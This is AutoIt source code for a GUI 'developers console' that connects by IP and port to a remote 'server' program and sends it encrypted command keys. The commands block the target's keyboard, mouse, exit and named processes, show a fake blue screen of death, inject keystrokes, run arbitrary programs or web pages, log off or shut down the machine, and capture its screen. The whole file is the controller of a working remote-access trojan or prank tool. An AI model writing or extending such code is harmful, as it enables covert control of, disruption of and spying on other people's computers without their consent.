#include #include #include #include #include #include #include #include #include #include Opt("WinTitleMatchMode", 2) Opt("Winsearchchildren", 1) Opt("windetecthiddentext", 1) Opt("TCPTimeout", 100) Opt("TrayAutoPause", 0) Opt("trayicondebug", 1) TCPStartup() $maingui = GUICreate("TCP Services Developers Console", @DesktopWidth - 20, @DesktopHeight - 80, 10, 10, BitOR($GUI_SS_DEFAULT_GUI, $WS_SIZEBOX)) $list = GUICtrlCreateList("1.) TCP Services Developers Console...", 10, 10, @DesktopWidth - 40, @DesktopHeight - 140, BitOR($WS_BORDER, $WS_VSCROLL, $WS_HSCROLL, $LBS_NOSEL, $LBS_DISABLENOSCROLL)) _GUICtrlListBox_SetHorizontalExtent($list, 5000) $number = "2" $admin = "0" $connected = "no" $username = @UserName $connected = 0 $input = GUICtrlCreateInput("", 10, @DesktopHeight - 120, @DesktopWidth - 40, 20) GUISetState() While 1 $msg = GUIGetMsg() Select Case $msg = $GUI_EVENT_CLOSE Exit 0 Case $msg = $input $inputread = GUICtrlRead($input) If $inputread = "Info" Then _addtolist("Application information:") _addtolist(" TCP Services Developers Console") _addtolist(" Version") _addtolist(" Compatible with version of TCP Services") _addtolist(" Programmed in Autoit by Subzerostig") _addtolist(" BSOD made by Matthieuautoitscripter") ElseIf $inputread = "ChangeAdmin" Then _clearinput() _addtolist("Enter admin level...") While 1 If GUIGetMsg() = $input Then $admin = GUICtrlRead($input) ExitLoop EndIf WEnd _addtolist("Your admin level has been changed to: " & $admin) ElseIf $inputread = "ChangeUsername" Then _clearinput() _addtolist("Enter username...") While 1 If GUIGetMsg() = $input Then $username = GUICtrlRead($input) ExitLoop EndIf WEnd _addtolist("Your username has been changed to: " & $username) ElseIf $inputread = "Commands" Then _addtolist("List of Commands") _addtolist(" ChangeAdmin - changes security level") _addtolist(" ChangeUsername - changes your username") _addtolist(" Commands - Displays available commands") _addtolist(" Connect - Connects up to a server") _addtolist(" ConnectionData - displays connection data") _addtolist(" Disconnect - Disconnects from a connected server") _addtolist(" Exit - exits application, disconnecting safely") _addtolist(" GetIP - Retrieves computer IP") _addtolist(" Info - Displays application information") _addtolist(" Message - Message a connected server") _addtolist(" RefreshConnection - Resends data to server") _addtolist(" SendFunc - sends a function to the server:") _addtolist(" ==> BlockExit - blocks server from exiting") _addtolist(" ==> BlockInput - blocks server input") _addtolist(" ==> BlockProcess - blocks a process on the server") _addtolist(" ==> Bsod - initiates blue screen of death on server") _addtolist(" ==> ChangeRes- Changes the screen resolution") _addtolist(" ==> Logoff - logs off the server") _addtolist(" ==> Sendkeys - simulates key presses on server") _addtolist(" ==> ShellExecute - starts process/open webpage") _addtolist(" ==> ShowScreen - shows screen (note: does not send all data. Very glitchy)") _addtolist(" ==> Shutdown - shuts down the server") _addtolist(" ==> UnblockExit - unblocks server from exiting") _addtolist(" ==> UnblockInput - unblocks server input") _addtolist(" ==> Unbsod - closes blue screen of death on server") ElseIf $inputread = "Connect" Then _addtolist("Enter Ip to connect to...") _clearinput() While 1 If GUIGetMsg() = $input Then $ip = GUICtrlRead($input) ExitLoop EndIf WEnd _addtolist("Enter Port to connect to...") _clearinput() While 1 If GUIGetMsg() = $input Then $port = GUICtrlRead($input) ExitLoop EndIf WEnd _addtolist("Connecting please wait...") _clearinput() $result = TCPConnect($ip, $port) Sleep(250) If $result = -1 Or 0 Then _addtolist("Error connecting. Error Code: " & @error) Else _addtolist("Verifying ID...") $sent = TCPSend($result, "-**-identification-**-") If $sent = 0 Then _addtolist("Error. Error Code: " & @error) Else _addtolist("Sending key...") $encryptionkey = Random("1", "9999", 1) $sent = TCPSend($result, _StringEncrypt(1, $encryptionkey, "-**-key-**-", 5)) If $sent = 0 Then _addtolist("Error. Error Code: " & @error) Else Sleep(500) _addtolist("Sending Username. " & $username) $sent = _esend($username) If $sent = 0 Then _addtolist("Error. Error Code: " & @error) Else Sleep(500) _addtolist("Sending Admin level. Level " & $admin) $sent = _esend($admin) If $sent = 0 Then _addtolist("Error. Error Code: " & @error) Else _addtolist("Connected") $connected = 1 $connectedip = $ip $connectedport = $port $connectedkey = $encryptionkey $connectedadmin = $admin $connectedusername = $username EndIf EndIf EndIf EndIf EndIf ElseIf $inputread = "ConnectionData" Then If $connected = 1 Then _addtolist("Connection Data:") _addtolist(" IP: " & $connectedip) _addtolist(" PORT: " & $connectedport) _addtolist(" KEY: " & $connectedkey) _addtolist(" USERNAME: " & $connectedusername) _addtolist(" ADMIN LEVEL: " & $connectedadmin) Else _addtolist("Error: Not connected") EndIf ElseIf $inputread = "Disconnect" Then _clearinput() _addtolist("Disconnecting...") If $connected = 1 Then $sent = _esend("-**-dis-connect-**-") If $sent = 0 Then _addtolist("Error. Error Code: " & @error) _addtolist("Connection has been nullified however connection may still exist") Else _addtolist("Disconnected") EndIf Else _addtolist("Error: Not connected") EndIf $connected = 0 ElseIf $inputread = "Exit" Then If $connected = 1 Then _addtolist("Disconnecting...") $sent = _esend("-**-dis-connect-**-") If $sent = 0 Then _addtolist("Error. Error Code: " & @error) _addtolist("Connection has been nullified however connection may still exist") Else _addtolist("Disconnected") EndIf EndIf _addtolist("Exiting...") Exit 0 ElseIf $inputread = "GetIP" Then _addtolist("IP Address: " & @IPAddress1) ElseIf $inputread = "Message" Then If $connected = 1 Then _addtolist("Enter data to send...") _clearinput() While 1 If GUIGetMsg() = $input Then $data = GUICtrlRead($input) ExitLoop EndIf WEnd _clearinput() $sent = _esend($data) If $sent = 0 Then _addtolist("Error. Error Code: " & @error) Else _addtolist("Message sent") EndIf Else _addtolist("Error: Not connected") EndIf ElseIf $inputread = "RefreshConnection" Then _addtolist("Refreshing connection...") $sent = _esend("-**-changeid-**-") If $sent = 0 Then _addtolist("Error: Error code: " & @error) EndIf Sleep(100) _addtolist("Sending username: " & $username) $sent = _esend($username) If $sent = 0 Then _addtolist("Error: Error code: " & @error) EndIf Sleep(100) _addtolist("Sending security level: " & $admin) $sent = _esend($admin) If $sent = 0 Then _addtolist("Error: Error code: " & @error) EndIf $connectedadmin = $admin $connectedusername = $username _addtolist("Connection refreshed") ElseIf $inputread = "SendFunc" Then _clearinput() If $connected = 1 Then _addtolist("Enter function to send") While 1 If GUIGetMsg() = $input Then $data = GUICtrlRead($input) ExitLoop EndIf WEnd Switch $data Case "BlockExit" _addtolist("Sending function key") $sent = _esend("-**-block-exit-**-") If $sent = 0 Then _addtolist("Error: Error code " & @error) Else _addtolist("Exit has been blocked") EndIf Case "BlockInput" _addtolist("Sending function key") $sent = _esend("-**-block-input-**-") If $sent = 0 Then _addtolist("Error: Error code " & @error) Else _addtolist("Input has been blocked") EndIf Case "BlockProcess" _clearinput() _addtolist("Enter process to block") While 1 If GUIGetMsg() = $input Then $data = GUICtrlRead($input) ExitLoop EndIf WEnd _addtolist("Sending Function key") $sent = _esend("-**-block-process-add-**-") If $sent = 0 Then _addtolist("Error: Error code " & @error) Else Sleep(250) _addtolist("Sending process") $sent = _esend($data) If $sent = 0 Then _addtolist("Error: Error code " & @error) Else _addtolist("Process blocked") EndIf EndIf Case "Bsod" _addtolist("Sending function key") $sent = _esend("-**-bsod-**-") If $sent = 0 Then _addtolist("Error: Error code " & @error) Else _addtolist("Blue screen of death has initialized") EndIf Case "ChangeRes" _clearinput() _addtolist("Enter width...") While 1 If GUIGetMsg() = $input Then $width = GUICtrlRead($input) ExitLoop EndIf WEnd _clearinput() _addtolist("Enter height...") While 1 If GUIGetMsg() = $input Then $height = GUICtrlRead($input) ExitLoop EndIf WEnd _clearinput() _addtolist("Sending function key") $sent = _esend("-**-change-res-**-") If $sent = 0 Then _addtolist("Error: Error code " & @error) Else Sleep(150) _addtolist("Sending screen width") $sent = _esend($width) If $sent = 0 Then _addtolist("Error: Error code " & @error) Else _addtolist("Sending screen height") $sent = _esend($height) If $sent = 0 Then _addtolist("Error: Error code " & @error) Else _addtolist("Resolution changed") EndIf EndIf EndIf Case "Logoff" _addtolist("Sending function key") $sent = _esend("-**-log-off-**-") If $sent = 0 Then _addtolist("Error: Error code " & @error) Else _addtolist("Logged off") EndIf Case "Sendkeys" _clearinput() _addtolist("Enter raw keys to send") While 1 If GUIGetMsg() = $input Then $data = GUICtrlRead($input) ExitLoop EndIf WEnd _addtolist("Sending function key") $sent = _esend("-**-send-keys-**-") If $sent = 0 Then _addtolist("Error: Error code " & @error) Else Sleep(250) _addtolist("Sending keys") $sent = _esend($data) If $sent = 0 Then _addtolist("Error: Error code " & @error) Else _addtolist("Keys sent") EndIf EndIf Case "ShellExecute" _clearinput() _addtolist("Enter process to run/webpage to open...") While 1 If GUIGetMsg() = $input Then $data = GUICtrlRead($input) ExitLoop EndIf WEnd _addtolist("Sending function key") $sent = _esend("-**-shell-execute-**-") If $sent = 0 Then _addtolist("Error: Error code " & @error) Else Sleep(250) _addtolist("Sending process/webpage") $sent = _esend($data) If $sent = 0 Then _addtolist("Error: Error code " & @error) Else _addtolist("Process ran/webpage opened") EndIf EndIf Case "ShowScreen" _clearinput() $showscreenerror = _showscreen() If $showscreenerror = -1 Then Switch @error Case 1 _addtolist("The connection timed out") Case 2 _addtolist("Please enter a valid jpg quality") Case Else _addtolist("Error: Error code " & @error) EndSwitch EndIf Case "Shutdown" _addtolist("Sending function key") $sent = _esend("-**-shut-down-**-") If $sent = 0 Then _addtolist("Error: Error code " & @error) Else _addtolist("shut down") EndIf Case "UnblockExit" _addtolist("Sending function key") $sent = _esend("-**-unblock-exit-**-") If $sent = 0 Then _addtolist("Error: Error code " & @error) Else _addtolist("Exit has been unblocked") EndIf Case "UnblockInput" _addtolist("Sending function key") $sent = _esend("-**-unblock-input-**-") If $sent = 0 Then _addtolist("Error: Error code " & @error) Else _addtolist("Input has been unblocked") EndIf Case "UnBsod" _addtolist("Sending function key") $sent = _esend("-**-unbsod-**-") If $sent = 0 Then _addtolist("Error: Error code " & @error) Else _addtolist("Blue screen of death has been closed") EndIf Case Else _addtolist("Error: Function not recognised") EndSwitch Else _addtolist("Error: Not connected") EndIf Else _addtolist("The command '" & $inputread & "' could not be found. Type in commands for a list of commands") EndIf _clearinput() EndSelect WEnd Func _addtolist($atl_input) GUICtrlSetData($list, $number & ".) " & $atl_input) $number = $number + 1 _GUICtrlListBox_SetCurSel($list, _GUICtrlListBox_GetCount($list) - 1) EndFunc ;==>_addtolist Func _esend($messagetoencyptsend) $tcp_encryptionresult = TCPSend($result, _StringEncrypt(1, $messagetoencyptsend, $encryptionkey, 1)) Return $tcp_encryptionresult EndFunc ;==>_esend Func _clearinput() GUICtrlSetData($input, "") EndFunc ;==>_clearinput Func _showscreen() _clearinput() _addtolist("Enter .jpg quality (1-100)") While 1 If GUIGetMsg() = $input Then $showscreenquality = GUICtrlRead($input) ExitLoop EndIf WEnd _clearinput() If $showscreenquality < 1 Or $showscreenquality > 100 Then SetError(2) Return -1 EndIf Global $timerhandle = TimerInit() _addtolist("Creating server for .jpg...") Global $tempsocket = TCPListen(@IPAddress1, "54321") If $tempsocket = -1 Or $tempsocket = 0 Then SetError(3) Return -1 EndIf _addtolist("Sending function key") $sent = _esend("-**-show-screen-**-") If $sent = 0 Then SetError(@error) Return -1 EndIf Sleep(150) _addtolist("Sending IP address") $sent = _esend(@IPAddress1) If $sent = 0 Then SetError(@error) Return -1 EndIf Sleep(150) _addtolist("Sending .jpg quality") $sent = _esend($showscreenquality) If $sent = 0 Then SetError(@error) Return -1 EndIf _addtolist("Waiting for server to connect") Do Global $tempaccept = TCPAccept($tempsocket) Until $tempaccept <> -1 Or TimerDiff($timerhandle) > 5000 If TimerDiff($timerhandle) > 5000 Then SetError(1) Return -1 EndIf If FileExists(@TempDir & "\tcp services show screen.jpg") Then FileDelete(@TempDir & "\tcp services show screen.jpg") EndIf _addtolist("receiving file") Do $temprecv = TCPRecv($tempaccept, 100000000) Until $temprecv <> "" Or TimerDiff($timerhandle) > 5000 If TimerDiff($timerhandle) > 5000 Then SetError(1) Return -1 EndIf FileWrite(@TempDir & "\tcp services show screen.jpg", $temprecv) TCPCloseSocket($tempsocket) ShellExecute(@TempDir & "\tcp services show screen.jpg") EndFunc ;==>_showscreen